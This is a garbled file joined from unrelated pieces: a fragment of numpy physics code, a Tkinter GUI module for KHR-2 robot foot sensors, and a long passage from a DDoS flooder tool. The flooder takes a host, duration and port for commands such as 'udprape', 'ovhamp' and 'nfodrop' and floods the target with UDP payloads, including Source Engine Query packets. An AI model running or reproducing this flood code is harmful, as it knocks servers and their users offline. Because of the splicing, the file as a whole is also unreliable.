b = np.zeros(n+1)
if l == 2 and m == 0:
for i in range(1, n+1):
b[i] = (omega * radius[i])**2 / (3. * np.sqrt(5.))
if tides:
b[i] += g * mp * radius[i]**2 / rp**3 * \
np.sqrt(5.) / 10.
if l == 2 and m == 2 and tides:
for i in range(1, | |
################################################################################
#
# GuiWinKHR2Feet
#
""" Graphical User Interface KHR-2 BrainPack Feet Window
Graphical User Interface (GUI) Tkinter window displays current
RoadNarrows BrainPack feet sensor data, plus simple display options.
Author: <NAME>
Email: <EMAIL>
URL: http://www.roadnarrowsrobotics.com
Date: 2006.10.21
Copyright (C) 2007. RoadNarrows LLC.
"""
#
# All Rights Reserved
#
# Permission is hereby granted, without written agreement and without
# license or royalty fees, to use, copy, modify, and distribute this
# software and its documentation for any purpose, provided that
# (1) The above copyright notice and the following two paragraphs
# appear in all copies of the source code and (2) redistributions
# including binaries reproduces these notices in the supporting
# documentation. Substantial modifications to this software may be
# copyrighted by their authors and need not follow the licensing terms
# described here, provided that the new terms are clearly indicated in
# all files where they apply.
#
# IN NO EVENT SHALL THE AUTHOR, ROADNARROWS LLC, OR ANY MEMBERS/EMPLOYEES
# OF ROADNARROW LLC OR DISTRIBUTORS OF THIS SOFTWARE BE LIABLE TO ANY
# PARTY FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL
# DAMAGES ARISING OUT OF THE USE OF THIS SOFTWARE AND ITS DOCUMENTATION,
# EVEN IF THE AUTHORS OR ANY OF THE ABOVE PARTIES HAVE BEEN ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
#
# THE AUTHOR AND ROADNARROWS LLC SPECIFICALLY DISCLAIM ANY WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS FOR A PARTICULAR PURPOSE. THE SOFTWARE PROVIDED HEREUNDER IS ON AN
# "AS IS" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE NO OBLIGATION TO
# PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR MODIFICATIONS.
#
################################################################################
import sys
import socket
import errno
import time
import math
import random
import tkinter as tk
import Fusion.Core.Values as Values
import Fusion.Utils.IVTimer as IVTimer
import Fusion.Gui.GuiTypes as gt
import Fusion.Gui.GuiUtils as gut
import Fusion.Gui.GuiToolTip as GuiToolTip
import Fusion.Gui.GuiMenuBar as GuiMenuBar
import Fusion.Gui.GuiStatusBar as GuiStatusBar
import Fusion.Gui.GuiDlgAbout as GuiDlgAbout
import Fusion.Gui.GuiDlgSaveAs as GuiDlgSaveAs
import Fusion.Gui.GuiWin as GuiWin
import Fusion.KHR2.Cmd.BsProxyClient as BsProxyClient
import Fusion.KHR2.Gui.GuiDlgKHR2Proxy as GuiDlgKHR2Proxy
#-------------------------------------------------------------------------------
# Global Data
#-------------------------------------------------------------------------------
# BrainPack Data Classes
BpDataClassRaw = 0
BpDataClassCooked = 1
# BrainPack Feet
BpFeet = ['bpfoot_left', 'bpfoot_right'] # keys
BpFootSensorMax = 255 # max. sensor data value
BpFootSensorMask = 0x00ff # sensor mask
BpFootVecMagMax = 858 # max calc'd vector length
BpFootWidth = 32.5 # mm from left to right sensor columns
BpFootHeight = 86.0 # mm from top to bottom sensor rows
BpFootPtFulcrum = (BpFootWidth/2.0, BpFootHeight/2.0)
# point fulcrum position at center of foot
BpFootNumOfSoleSensors = 6
BpFootNumOfToeSensors = 2
BpFootNumOfFootSensors = BpFootNumOfSoleSensors + BpFootNumOfToeSensors
# foot sensor index order
BpFootSensorUppL = 0 # foot upper left
BpFootSensorUppR = 1 # foot upper right
BpFootSensorMidL = 2 # foot middle left
BpFootSensorMidR = 3 # foot middle right
BpFootSensorLowL = 4 # foot lower left
BpFootSensorLowR = 5 # foot lower right
BpFootSensorToeL = 6 # foot toe left
BpFootSensorToeR = 7 # foot toe right
# feet canvas dimensions
_EdgeLeft = 15 # left edge margin
_EdgeTop = 10 # top edge margin
_EdgeBottom = 15 # bottom edge margin
_EdgeRight = 15 # right edge margin
# minimum size
_CanvasMinWidth = 400 + _EdgeLeft + _EdgeRight
_CanvasMinHeight = 400 + _EdgeTop + _EdgeBottom
twopi = math.pi * 2.0
#--
def HSVtoRGB(h, s, v):
""" Convert Hue-Saturation-Value into Red-Green-Blue equivalent.
Parameters:
h - Hue between [0.0, 360.0) degrees. red(0.0) to violet(360.0-).
s - Staturation [0.0, 1.0]
v - Value [0.0, 1.0]
Return Value:
(r, g, b) 3-tuple with each color between [0, 255]
"""
# achromatic (grey)
if s == 0.0:
r = g = b = int(v * 255)
return (r, g, b)
# sector 0 to 5
h /= 60.0
i = int(h) # hue whole part
f = h - i # hue fraction part of h
p = v * (1.0 - s)
q = v * (1.0 - s * f)
t = v * (1.0 - s * (1.0 - f ))
if i == 0:
r = int(v * 255.0)
g = int(t * 255.0)
b = int(p * 255.0)
elif i == 1:
r = int(q * 255.0)
g = int(v * 255.0)
b = int(p * 255.0)
elif i == 2:
r = int(p * 255.0)
g = int(v * 255.0)
b = int(t * 255.0)
elif i == 3:
r = int(p * 255.0)
g = int(q * 255.0)
b = int(v * 255.0)
elif i == 4:
r = int(t * 255.0)
g = int(p * 255.0)
b = int(v * 255.0)
else: # sector 5
r = int(v * 255.0)
g = int(p * 255.0)
b = int(q * 255.0)
return (r, g, b)
#--
def ColorMap(val, max):
f = float(val) / float(max+1) # [0.0, 1.0)
#hue = 240.0 - 180.0 * f # blue(0) to yellow(max)
hue = 240.0
value = 0.3 + 0.7 * f # dark to light
#value = 1.0
#value = 1.0 - 0.5 * f # light to dark
sat = 0.1 + 0.9 * f # grey to pure
#sat = 1.0 - 0.25 * f # pure to grey
return "#%02x%02x%02x" % HSVtoRGB(hue, sat, value)
#--
def PsychoColorMap(val, max):
base = 0x03
color = base + val * (0xffffff / max)
strcolor = "#%02x%02x%02x" % ((color>>16)&0xff, (color>>8)&0xff, color&0xff)
return strcolor
#-------------------------------------------------------------------------------
# CLASS: GuiWinKHR2Feet
#-------------------------------------------------------------------------------
class GuiWinKHR2Feet(GuiWin.GuiWin):
""" GUI Window vKHR2 Feet Log Visualizer Class """
#--
def __init__(self, parent, **options):
""" Initialize the vKHR2 Feet Window.
Parameters:
parent - GUI parent of this window
options - Feet options. Options are:
auto=<bool> - do [not] automatically update
**winoptions - GuiWin core options
"""
# first initializations
self.Init(**options)
# create the window
options[Values.FusionCWinKeyTitle] = \
'vKHR2 RoadNarrows BrainPack Feet Visualizer'
GuiWin.GuiWin.__init__(self, parent, **options)
def _initMenuBar(self):
""" Initialize menubar. """
# File menubar items
self.mMenuBar.AddMenuItem('File', 'cascade', owner='root')
self.mMenuBar.AddMenuItem('File|Log...', 'command', owner='root',
command=self.CbLogData)
self.mMenuBar.AddMenuItem('File|Exit', 'command', owner='root',
command=self.destroy)
self.mMenuBar.AddMenuItem('Tools', 'cascade', owner='root')
self.mMenuBar.AddMenuItem('Tools|Configure...',
'command', owner='root', command=self.CbCfgBsProxy)
self.mMenuBar.AddMenuItem('Tools|IDs',
'command', owner='root', command=self.CbFootIds)
self.mMenuBar.AddMenuItem('Tools|Calibrate',
'command', owner='root', command=self.CbFootCal)
self.mMenuBar.AddMenuItem('Tools', 'separator')
self.mMenuBar.AddMenuItem('Tools|I' + gt.UniSuperscript['2']+'C Scan...',
'command', owner='root', command=self.CbI2CScan)
self.mMenuBar.AddMenuItem('Tools', 'separator')
self.mMenuBar.AddMenuItem('Tools|Test Gui',
'command', owner='root', command=self.CbTestGui)
#--
def Init(self, **options):
""" First initializations.
Parameters:
vKHR2 - vKHR2 object.
options - feet input options.
Return Value:
None
"""
# defaults
self.mIsAutoMode = False
self.mDataClass = BpDataClassRaw
self.mBsClient = BsProxyClient.BsProxyClient()
self.mBpFootState = {'bpfoot_left':False, 'bpfoot_right':False}
self.mI2CDevName = '/dev/i2c/0' # default for KoreBot
self.mTestGui = False
# set options from input parameters
for k,v in options.items():
if k == 'auto':
if v:
self.mIsAutoMode = True
else:
self.mIsAutoMode = False
elif k == 'data_class':
self.mDataClass = v
# locals
self.mIvtPull = IVTimer.IVTimer(1.50, 0.25, self.IVClient, once=True)
self.mIvtPull.start()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# GuiWin Overrides
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#--
def body(self):
""" Initialize the gui window initialization callback. """
# menu bar
self.mMenuBar = GuiMenuBar.GuiMenuBar(self)
# create the widgets
self.GuiBody(self)
# refresh the feet canvas
self.FeetCanvasRefresh()
# add menu bar
self._initMenuBar()
#--
def show(self):
""" Show the gui window initialization callback. """
# calculate important window and widget dimensions used for resizing
self.CalcDim()
#--
def resize(self, event):
""" Resize callback event. """
geo = gut.geometry(self)
# window size has changed, clear but don't redraw until resizing is done
if geo[gut.W] != self.mWinGeo[gut.W] or geo[gut.H] != self.mWinGeo[gut.H]:
self.mWinGeo = geo
self.FeetCanvasClearFeet()
width = geo[gut.W] - self.mWinBorder
height = geo[gut.H] - self.mWinBorder - self.mCtlPanelFrameHeight
self.mFeetCanvas.configure(width=width, height=height)
self.FeetCanvasParams(width, height)
width = geo[gut.W] - self.mWinStatusBarBorder
self.mStatusBar.configure(width=width)
self.mHasResized = True
# resizing done, now redraw
elif self.mHasResized:
self.FeetCanvasDrawFeet()
self.mHasResized = False
#--
def destroy(self):
""" Destroy window callback event. """
GuiWin.GuiWin.destroy(self, auto=self.mIsAutoMode,
data_class=self.mDataClass)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Window Update
# - - - - - - - - - - - - - - - - | |
port, punch)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "udp":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 1024
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "killallv2":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 1460
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "killallv3":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 1460
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "udprape":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 20179
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "udprapev2":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "udpbypass":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "http-stm":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "http-cld":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "ddos-guard":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "Rename By Dhx ->Dhiyaflare":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "icmprape":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 1024
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "udprapev3":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 10000
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "nfodrop":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
payload = b"\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58"
threading.Thread(target=stdsender, args=(host, port, timer, payload)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "ovhnat":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
payload = b"\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58\x99\x21\x58"
threading.Thread(target=stdsender, args=(host, port, timer, payload)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "ovhamp":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
payload = b"\xff\xff\xff\xffTSource Engine Query\x00"
threading.Thread(target=stdsender, args=(host, port, timer, payload)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "nfocrush":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
payload = b"\xff\xff\xff\xffTSource Engine Query\x00"
threading.Thread(target=stdsender, args=(host, port, timer, payload)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "greeth":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
payload = b"\xff\xff\xff\xffTSource Engine Query\x00"
threading.Thread(target=stdsender, args=(host, port, timer, payload)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "telnet":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
payload = b"\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00"
threading.Thread(target=stdsender, args=(host, port, timer, payload)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "ovhkill":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
payload = b"\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00"
threading.Thread(target=stdsender, args=(host, port, timer, payload)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "ovhdown":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
payload = b"\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00"
threading.Thread(target=stdsender, args=(host, port, timer, payload)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
